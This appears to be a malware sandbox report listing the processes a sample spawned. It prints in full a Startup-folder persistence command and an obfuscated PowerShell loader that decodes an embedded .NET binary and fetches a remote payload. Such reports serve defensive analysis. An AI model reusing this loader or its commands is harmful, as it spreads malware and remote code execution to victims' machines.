Start date:	21/02/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Imagebase:	0x7ff744280000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exePID: 6096, Parent PID: 5992

General

Target ID:	20
Start time:	06:49:35
Start date:	21/02/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: PING.EXEPID: 6540, Parent PID: 5992

General

Target ID:	21
Start time:	06:49:35
Start date:	21/02/2022
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping 127.0.0.1 -n 10
Imagebase:	0x7ff779ac0000
File size:	21504 bytes
MD5 hash:	6A7389ECE70FB97BFE9A570DB4ACCC3B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: RegSvcs.exePID: 3016, Parent PID: 5876

General

Target ID:	22
Start time:	06:49:36
Start date:	21/02/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0xf50000
File size:	45152 bytes
MD5 hash:	2867A3817C9245F7CF518524DFD18F28
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET

Analysis Process: powershell.exePID: 5184, Parent PID: 5992

General

Target ID:	24
Start time:	06:49:45
Start date:	21/02/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Imagebase:	0x7ff777fc0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET

Analysis Process: powershell.exePID: 5872, Parent PID: 1744

General

Target ID:	28
Start time:	06:50:05
Start date:	21/02/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHgIoJw?? ?? Cio?? Ez?? H?? Lc?? ?? ?? ?? B?? ?? ?? Rcic?? ?? H?? Kcyg?? ?? ?? olKCk?? ?? ?? pvKg?? ?? CgYoKw?? ?? Cm8s?? ?? ?? KCwcoKw?? ?? CgsHcn8?? ?? HByhQ?? ?? cG8t?? ?? ?? KC3Mo?? ?? ?? K?? igr?? ?? ?? KKCw?? ?? ?? oMCCgr?? ?? ?? KDHKJ?? ?? BwKCs?? ?? ?? oNCXLP?? ?? BwKCs?? ?? ?? ooLg?? ?? Cg0oLw?? ?? CgcoM?? ?? ?? Cm8x?? ?? ?? Kcuc?? ?? HBvMg?? ?? CnIL?? QBwbzM?? ?? ?? oUGI0X?? ?? ?? BJRYJch0B?? H?? oLg?? ?? CqIlFwgoM?? ?? ?? CqJvN?? ?? ?? CiYqNgIDKDU?? ?? ?? ooNg?? ?? Cioe?? ig3?? ?? ?? KKi7QCQ?? ?? ?? igi?? ?? ?? KKh4CKDg?? ?? ?? oq?? ?? ?? ?? Ez?? B?? BQ?? ?? ?? ?? C?? ?? ?? R?? owF?? ?? ?? bLQgo?? Q?? ?? Kwor?? gIKBioi?? /4VBQ?? ?? Gyoe?? ign?? ?? ?? KKg?? ?? ?? BMw?? g?? o?? ?? ?? ?? ?? w?? ?? EQJ7Og?? ?? Cm87?? ?? ?? KCgaMC?? ?? ?? Gy0SK?? I?? ?? CsK?? ns6?? ?? ?? KBm88?? ?? ?? KBipK?? ign?? ?? ?? K?? nM9?? ?? ?? KfTo?? ?? ?? oq?? EJTSkIB?? ?? E?? ?? ?? ?? ?? ?? ?? w?? ?? ?? B2NC4wLjMwMzE5?? ?? ?? ?? ?? ?? U?? b?? ?? ?? ?? MwH?? ?? ?? jfg?? ?? O?? g?? ?? BQI?? ?? ?? jU3RyaW5ncw?? ?? ?? ?? BME?? ?? ?? O?? E?? ?? CNVUwCEEQ?? ?? E?? ?? ?? ?? CNHVUlE?? ?? ?? ?? lBE?? ?? CQE?? ?? ?? jQmxvYg?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? BVxWiCQkP?? ?? ?? ?? +gEz?? BY?? ?? ?? E?? ?? ?? ?? u?? ?? ?? ?? Cg?? ?? ?? ?? g?? ?? ?? ?? Z?? ?? ?? ?? BQ?? ?? ?? D0?? ?? ?? B?? ?? ?? ?? ?? ?? w?? ?? ?? ?? U?? ?? ?? ?? J?? ?? ?? ?? Cg?? ?? ?? ?? g?? ?? ?? ?? B?? ?? ?? ?? ?? w?? ?? ?? ?? E?? ?? ?? ?? C?? ?? ?? ?? ?? w?? ?? ?? ?? I?? ?? ?? ?? ?? ?? IkE?? Q?? ?? ?? ?? ?? ?? BgBC?? 98GBgCv?? 98GBg?? Z?? i?? GDwBDBw?? ?? BgBa?? ioFBg?? l?? yoFBgCW?? yoFBgBi?? yoFBgB7?? yoFBgCh?? ioFBgBG?? pkGBgDC?? ZkGBgDt?? ioFBgC8?? gYECgDl?? d?? FCgCS?? XMECg?? t?? nMEDgBf?? W8GDg?? ?? BjMGBgDV?? i?? GDgBx?? rgGDgCJ?? ns?? BgCYB5YEDgDsBW8GDg?? K?? 3s?? Bg?? n?? ZYEDg?? B?? EkECgDQ?? akEBgD8?? S?? GBgCn?? d8GBgD?? Bf8GBgBHBRUFCgBv?? Q?? FBg?? ?? ?? ZYEBgD4ByoFCgB6?? Q?? FCgD?? B6kHBgD9?? 9IHDgBSB3s?? BgBCBJYEBgDGBJYEBgDKB5YEBg?? 8BSoFBgBU?? SoFBgCCB98GBg?? JBpYE?? ?? ?? ?? ?? Dc?? ?? ?? ?? ?? ?? ?? E?? ?? Q?? ?? ?? ?? ?? ?? 8gToB0k?? ?? Q?? B?? ?? ?? ?? ?? ?? D+BegHTQ?? B?? ?? I?? ?? ?? EQ?? J8H6?? dd?? ?? E?? ?? w?? ?? ?? Q?? ?? H?? cQB10?? BQ?? I?? ?? ?? BE?? BnB+gHhQ?? H?? ?? s?? ?? ?? E?? ?? ?? EI6?? dd?? ?? g?? Dg?? B?? ?? ?? ?? 8?? NTBV0?? C?? ?? P?? ?? UB?? ?? BhBg?? ?? XQ?? I?? BE?? BQE?? ?? B?? ?? ?? ?? Bd?? ?? g?? G?? ?? x?? IUFJgEx?? FwFLgEx?? H?? FNgEx?? J4FPgER?? J0ERgER?? EQBSgER?? NQ?? TwEh?? N4H9wBQI?? ?? ?? ?? ?? ?? GGBMGBg?? B?? Fgg?? ?? ?? ?? ?? ?? YYEwYG?? ?? E?? YC?? ?? ?? ?? ?? ?? ERgZBlMB?? QCKI?? ?? ?? ?? ?? ?? TCPEFVwEB?? JYg?? ?? ?? ?? ?? BMI4gRc?? QE?? oi?? ?? ?? ?? ?? ?? EwjoBWEB?? QCuI?? ?? ?? ?? ?? ?? TCFEGZgEB?? Log?? ?? ?? ?? ?? BMIv?? Vr?? QE?? 7C?? ?? ?? ?? ?? ?? Ewgs?? X?? B?? QDzI?? ?? ?? ?? ?? ?? TCDgBdgEB?? Psg?? ?? ?? ?? ?? BEYGQZT?? QI?? ESE?? ?? ?? ?? ?? BhgTBgY?? ?? g?? ZIQ?? ?? ?? ?? ?? WCLQHfQEC?? C?? h?? ?? ?? ?? ?? BMIWgd9?? QI?? JyE?? ?? ?? ?? ?? BhgTBgY?? ?? g?? wIQ?? ?? ?? ?? ?? W?? Gk?? ggEC?? PMh?? ?? ?? ?? ?? MYCewfL?? ?? M?? ?? SI?? ?? ?? ?? ?? xgLt?? N?? ?? B?? ?? JIg?? ?? ?? ?? CD?? CQBhwEE?? BUi?? ?? ?? ?? ?? MYCQ?? TU?? ?? Q?? ICI?? ?? ?? ?? ?? EQBW?? IwBB?? B?? Ig?? ?? ?? ?? ?? B?? EI?? l?? EF?? Eki?? ?? ?? ?? ?? ?? YYEwYG?? ?? Y?? VCI?? ?? ?? ?? ?? ?? wjE?? Eo?? BgCIIg?? ?? ?? ?? ?? GGBMGBg?? G?? ?? ?? ?? ?? QDq?? w?? ?? ?? Q?? r?? ?? ?? ?? ?? QBRBQ?? ?? ?? QDk?? ?? ?? ?? ?? QDk?? ?? k?? EwYB?? BE?? EwYG?? Bk?? EwYK?? Ck?? EwYQ?? DE?? EwYQ?? Dk?? EwYQ?? EE?? EwYQ?? Ek?? EwYQ?? FE?? EwYQ?? Fk?? EwYV?? GE?? EwYQ?? Gk?? EwYQ?? HE?? EwYQ?? Hk?? EwYa?? Ik?? EwYg?? KE?? EwYG?? Kk?? EwYG?? LE?? EwYG?? Mk?? EwYm?? OE?? EwYQ?? Ok?? EwYG?? PE?? EwYG?? JE?? EwYG?? Jk?? EwYG?? ?? w?? EwYG?? BQ?? EwYG?? Bw?? EwYG?? CQ?? EwYG?? ?? w?? x?? BK?? BQ?? x?? BK?? Bw?? x?? BK?? CQ?? x?? BK?? Lk?? cgdP?? NE?? EgFV?? NE?? 9?? dd?? Pk?? EwZj?? CEBlgBr?? ?? kBEwYG?? Lk?? EwYG?? CkBEwYG?? DEBLgB7?? CkB+QOB?? DkBhwGI?? CkBMQSN?? EEBrQCS?? EEBkQeY?? EkB0?? Se?? FEBI?? Sk?? EkBkQCq?? BkBJ?? Gy?? NE?? owC4?? GEB+QC/?? GkB4QPG?? Lk?? ewfL?? Lk?? 7QDQ?? Lk?? Q?? TU?? HEBtQDg?? DQ?? 3gf3?? Dw?? zQNK?? Dw?? 1wMO?? Tw?? EwYG?? Ck?? owDM?? y4?? CwDF?? S4?? EwDO?? S4?? GwDt?? S4?? IwD2?? S4?? KwD2?? S4?? MwD2?? S4?? OwD2?? S4?? Qw?? E?? i4?? Sw?? c?? i4?? Uw?? c?? i4?? Ww?? i?? i4?? YwBM?? i4?? awBZ?? k?? ?? gwCn?? k?? ?? ewCs?? kM?? cwC1?? kM?? ewCs?? kk?? owDd?? 2M?? cwC1?? mM?? ewCs?? mk?? owDx?? 4?? ?? gwCn?? oM?? iwCn?? oM?? kwCn?? oM?? cwC1?? ok?? owD+?? 6?? ?? gwCn?? qM?? iwCn?? qM?? cwDO?? qM?? qwCn?? qM?? swCn?? qM?? kwCn?? qk?? ewDt?? c?? ?? gwCn?? sM?? swCn?? sM?? cw?? Q?? 8M?? ewDt?? ck?? ewDt?? e?? ?? gwCn?? uM?? iwCn?? uM?? kwCn?? uM?? qwCn?? uM?? swCn?? gkBow?? SBCMBewCs?? iMBmwBq?? 0MBewCs?? kMBUw?? c?? i?? CewCs?? i?? CgwCn?? k?? CewCs?? k?? CgwCn?? m?? CewCs?? m?? CgwCn?? o?? CewCs?? o?? CgwCn?? q?? CgwCn?? s?? CgwCn?? u?? CgwCn?? u?? CewCs?? g?? DgwCn?? i?? DgwCn?? i?? DewCs?? nQ?? 2?? Dr?? ?? Q?? ?? Q?? F?? ?? U?? Bg?? H?? ?? c?? C?? ?? K?? ?? k?? ?? ?? ?? ?? BpwB?? ?? D0BKEB?? ?? DsBaYB?? ?? BjBqsB?? ?? D?? Bb?? B?? ?? BM?? bUB?? ?? C4B7sB?? ?? BpB7sB?? ?? DI?? M?? B?? g?? E?? ?? M?? ?? g?? F?? ?? U?? ?? g?? G?? ?? c?? ?? g?? H?? ?? k?? ?? g?? I?? ?? s?? ?? g?? J?? ?? 0?? ?? Q?? K?? ?? 0?? ?? g?? N?? ?? 8?? ?? g?? O?? BE?? ?? g?? Y?? BM?? Lg?? 1?? Dw?? QwDd?? P?? ?? /w?? G?? QS?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FMF?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? U?? XI?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? BQBlgQ?? ?? ?? ?? ?? Cg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? HQF7?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? CYH?? ?? ?? J?? ?? Q?? Cg?? E?? ?? ?? ?? E?? ?? U?? E?? ?? ?? ?? ?? Q?? Cs?? Q?? ?? ?? ?? ?? ?? ?? LQB?? ?? HM?? 5gBz?? ?? kB?? ?? ?? ?? Q29udGV4dFZhbHVlYDE?? VGhyZWFkU2FmZU9iamVjdFByb3ZpZGVyYDE?? XzU?? Z2V0X1VURjg?? PE1vZHVsZT4?? V?? BEaXNwb3NlX19JbnN0YW5jZV9f?? ENyZWF0ZV9fSW5zdGFuY2VfXwBVRHNTaURiYgBtc2NvcmxpYgBNaWNyb3NvZnQuVmlzdWFsQmFzaWM?? TG9hZ?? BTeW5jaHJvbml6ZWQ?? R2V0TWV0aG9k?? FJlcGxhY2U?? Q3JlYXRlSW5zdGFuY2U?? Z2V0X0dldEluc3RhbmNl?? GRlZmF1bHRJbnN0YW5jZQBpbnN0YW5jZQBHZXRIYXNoQ29kZQBJbnZva2U?? UnVudGltZVR5cGVIYW5kbGU?? R2V0VHlwZUZyb21IYW5kbGU?? R2V0VHlwZQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQByZXNvdXJjZUN1bHR1cmU?? TWV0aG9kQmFzZQBBcHBsaWNhdGlvbkJhc2U?? QXBwbGljYXRpb25TZXR0aW5nc0Jhc2U?? U3RyUmV2ZXJzZQBFZGl0b3JCcm93c2FibGVTdGF0ZQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBHdWlkQXR0cmlidXRl?? EhlbHBLZXl3b3JkQXR0cmlidXRl?? EdlbmVyYXRlZENvZGVBdHRyaWJ1dGU?? RGVidWdnZXJOb25Vc2VyQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRl?? EVkaXRvckJyb3dzYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRl?? EFzc2VtYmx5VGl0bGVBdHRyaWJ1dGU?? U3RhbmRhcmRNb2R1bGVBdHRyaWJ1dGU?? SGlkZU1vZHVsZU5hbWVBdHRyaWJ1dGU?? QXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGU?? VGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRl?? ERlYnVnZ2VySGlkZGVuQXR0cmlidXRl?? EFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGU?? TXlHcm91cENvbGxlY3Rpb25BdHRyaWJ1dGU?? QXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRl?? EFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGU?? UnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGU?? Z2V0X1ZhbHVl?? HNldF9WYWx1ZQBHZXRPYmplY3RWYWx1ZQBVR2x5bXpVZwBzZXRfRW5jb2Rpbmc?? U3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5n?? ERvd25sb2FkU3RyaW5n?? FRvU3RyaW5n?? E1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFs?? FN5c3RlbS5Db21wb25lbnRNb2Rlb?? BscE9VcGxNcC5kbGw?? U3lzdGVt?? HJlc291cmNlTWFu?? FN5c3RlbS5Db21wb25lbnRNb2RlbC5EZXNpZ24?? QXBwRG9tYWlu?? GdldF9DdXJyZW50RG9tYWlu?? GdldF9BcHBsaWNhdGlvbgBNeUFwcGxpY2F0aW9u?? FN5c3RlbS5Db25maWd1cmF0aW9u?? FN5c3RlbS5HbG9iYWxpemF0aW9u?? FN5c3RlbS5SZWZsZWN0aW9u?? E1ldGhvZEluZm8?? Q3VsdHVyZUluZm8?? bHBPVXBsTX?? ?? bV9BcHBPYmplY3RQcm92aWRlcgBtX1VzZXJPYmplY3RQcm92aWRlcgBtX0NvbXB1dGVyT2JqZWN0UHJvdmlkZXI?? bV9NeVdlYlNlcnZpY2VzT2JqZWN0UHJvdmlkZXI?? Z2V0X1Jlc291cmNlTWFuYWdlcgBTeXN0ZW0uQ29kZURvbS5Db21waWxlcgBnZXRfVXNlcgBnZXRfQ29tcHV0ZXI?? TXlDb21wdXRlcgBBY3RpdmF0b3I?? LmN0b3I?? LmNjdG9y?? FN5c3RlbS5EaWFnbm9zdGljcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuRGV2aWNlcwBnZXRfV2ViU2VydmljZXM?? TXlXZWJTZXJ2aWNlcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQXBwbGljYXRpb25TZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM?? TWljcm9zb2Z0LlZpc3VhbEJhc2ljLkNvbXBpbGVyU2VydmljZXM?? U3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUmVzb3VyY2Vz?? GxwT1VwbE1wLk15LlJlc291cmNlcwBscE9VcGxNcC5SZXNvdXJjZXMucmVzb3VyY2Vz?? ERlYnVnZ2luZ01vZGVz?? FN0cmluZ3M?? Z2V0X1NldHRpbmdz?? E15U2V0dGluZ3M?? UmVmZXJlbmNlRXF1YWxz?? FJ1bnRpbWVIZWxwZXJz?? ENvbmNhd?? BPYmplY3Q?? TXlQcm9qZWN0?? FN5c3RlbS5OZXQ?? Z2V0X0RlZmF1bHQ?? V2ViQ2xpZW50?? ENvbnZlcnQ?? U3lzdGVtLlRleHQ?? bV9Db250ZXh0?? GxwT1VwbE1wLk15?? GdldF9Bc3NlbWJseQBNeVNldHRpbmdzUHJvcGVydHk?? ?? CVs?? H?? ?? TwBV?? H?? ?? b?? BN?? H?? ?? LgBS?? GU?? cwBv?? HU?? cgBj?? GU?? cw?? ?? V3Q?? e?? B0?? C4?? N?? ?? v?? H?? ?? bQB1?? HI?? Lw?? x?? DU?? Mg?? u?? Dc?? Nw?? x?? C4?? M?? ?? 1?? C4?? O?? ?? 5?? DE?? Q?? Bu?? G8?? d?? Bj?? GU?? d?? Bl?? GQ?? bwBu?? C8?? Lw?? 6?? H?? ?? d?? B0?? Gg?? ?? ?? VIJhEm?? QNB?? ?? BFawBy?? G8?? dwBl?? G0?? YQBy?? EY?? X?? BU?? EU?? Tg?? u?? HQ?? ZgBv?? HM?? bwBy?? GM?? aQBN?? Fw?? cwB3?? G8?? Z?? Bu?? Gk?? VwBc?? Do?? Qw?? ?? Fzk?? MQ?? z?? D?? ?? Mw?? u?? D?? ?? Lg?? 0?? HY?? X?? ?? ?? I2o?? SQBD?? HU?? Z?? BI?? E8?? T?? ?? u?? Ec?? WgBu?? G4?? SwBv?? Fc?? Yw?? ?? EXo?? egBH?? HY?? d?? Bw?? GI?? bw?? ?? GVw?? UgBl?? Gc?? UwB2?? GM?? cw?? u?? GU?? e?? Bl?? ?? ?? ?? hFFgqWcwdE6wlnV8YWFE?? g?? EI?? EBC?? Mg?? ?? EFI?? EBEREEI?? EBDgQg?? QECBS?? C?? Q4OBS?? B?? RFBBy?? E?? Q4ODg4GFRIo?? RIMBhUSK?? ESC?? YVEigBEmEGFRIo?? RIkBC?? ?? Ew?? F?? ?? ICHBwH?? ?? ESaRG?? iQUg?? BK?? jQcg?? gEOEoCNC?? ?? BEoCREoCRBgcEDg4ODgU?? ?? BK?? mQYg?? QESgJkE?? ?? EODgQg?? Q4OBS?? CDg4OBQ?? CDg4OBQ?? ?? EoClBQ?? BHQUOBy?? BEoCNHQUFI?? ESaQ4GI?? ESgK0OBi?? CHBwdH?? Q?? ?? RwcBC?? B?? hwDI?? ?? I?? y?? ?? DgQH?? R4?? ?? h4?? BR?? B?? B4?? B?? oBHg?? EBwET?? ?? YVEigBEw?? HBhUSbQET?? ?? YVEm0BEw?? CEw?? ECgET?? ?? Ug?? QET?? ?? i3elxWGTTgiQiwP19/EdUKOgcGFRIo?? RIMBwYVEigBEggHBhUSK?? ESYQcGFRIo?? RIk?? wYSfQQGEoCB?? wYSG?? M?? ?? ?? EE?? ?? ?? SD?? Q?? ?? BIIB?? ?? ?? EmEE?? ?? ?? SJ?? Q?? ?? BJ9BQ?? ?? EoCBBg?? B?? RK?? gQQ?? ?? BIYB?? ?? B?? Q4EI?? ?? SaQcQ?? QEe?? B4?? Bz?? B?? QEQHg?? EC?? ?? SD?? QI?? BIIB?? g?? EmEEC?? ?? SJ?? QI?? BJ9BQg?? EoCBB?? g?? EhgEK?? ?? T?? ?? gB?? ?? g?? ?? ?? ?? ?? ?? B4B?? ?? E?? V?? IWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEI?? Q?? C?? ?? ?? ?? ?? ?? ?? N?? Q?? IbHBPVXBsTX?? ?? ?? BcB?? BJDb3B5cmlnaHQgwqkgIDIwMjI?? ?? ?? UB?? ?? ?? ?? ?? CkB?? CRhMTU5NDFlMy03ZDM4LTQwYmEtYmI5MC1mYTE5YTZjNjg1NmI?? ?? ?? wB?? ?? cxLj?? uMC4w?? ?? BN?? Q?? cLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjUuMQE?? V?? 4URnJhbWV3b3JrRGlzcGxheU5hbWUULk5FVCBGcmFtZXdvcmsgNC41LjEE?? Q?? ?? ?? ?? gB?? ?? E?? ?? ?? ?? ?? ?? BgB?? ?? pNeVRlbXBsYXRlCDExLj?? uMC4w?? ?? BB?? Q?? zU3lzdGVtLlJlc291cmNlcy5Ub29scy5TdHJvbmdseVR5cGVkUmVzb3VyY2VCdWlsZGVyCDE3Lj?? uMC4w?? ?? BZ?? QBLTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5FZGl0b3JzLlNldHRpbmdzRGVzaWduZXIuU2V0dGluZ3NTaW5nbGVGaWxlR2VuZXJhdG9yCDE3Lj?? uMy4w?? ?? Bh?? Q?? 